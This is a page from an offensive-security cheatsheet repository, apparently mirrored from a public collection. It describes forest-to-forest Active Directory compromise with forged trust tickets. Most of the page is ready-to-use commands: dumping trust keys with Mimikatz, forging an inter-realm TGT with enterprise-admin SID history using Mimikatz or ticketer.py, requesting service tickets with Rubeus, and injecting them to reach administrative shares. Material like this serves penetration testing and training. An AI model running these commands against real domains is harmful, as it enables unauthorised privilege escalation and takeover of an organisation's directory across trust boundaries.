daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

trust-ticket.md (2719B)


      1 ---
      2 title: "Forest to Forest Compromise - Trust Ticket"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/trust-ticket.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/trust-ticket.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Forest to Forest Compromise - Trust Ticket
     12 
     13 * Require: SID filtering disabled
     14 
     15 From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
     16 Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
     17 
     18 ## Dumping Trust Passwords (trust keys)
     19 
     20 > Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts.
     21 
     22 ```powershell
     23 lsadump::trust /patch
     24 
     25 or find the TRUST_NAME$ machine account hash
     26 ```
     27 
     28 ## Create a Forged Trust Ticket (inter-realm TGT)
     29 
     30 * using **Mimikatz**
     31 
     32     ```powershell
     33     mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
     34     mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
     35     ```
     36 
     37 * using **Ticketer**
     38 
     39     ```ps1
     40     ticketer.py -nthash <NT_HASH> -domain-sid <S-1-5-21-SID> -domain <domain.lab> -extra-sid <S-1-5-21-SID_ENTERPRISE_ADM-519> -spn <krbtgt/domain.lab> <dummy name> 
     41 
     42     # -nthash: The hash to authenticate as the trust account.
     43     # -domain-sid: The SID for the domain that the account is valid in. 
     44     # -domain: The domain which the creds are valid on.
     45     # -extra-sid: The SID for Enterprise Admin's Group
     46     # -spn: The target service for the other domain
     47     # <dummy name>: The user doesn't have to be real.
     48     ```
     49 
     50 ## Use the Trust Ticket file to get a Service Ticket
     51 
     52 ```powershell
     53 .\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
     54 .\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
     55 ```
     56 
     57 Inject the Service Ticket file and access the targeted service with the spoofed rights.
     58 
     59 ```powershell
     60 kirbikator lsa .\ticket.kirbi
     61 ls \\machine.domain.local\c$
     62 ```
     63 
     64 ## References
     65 
     66 * [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)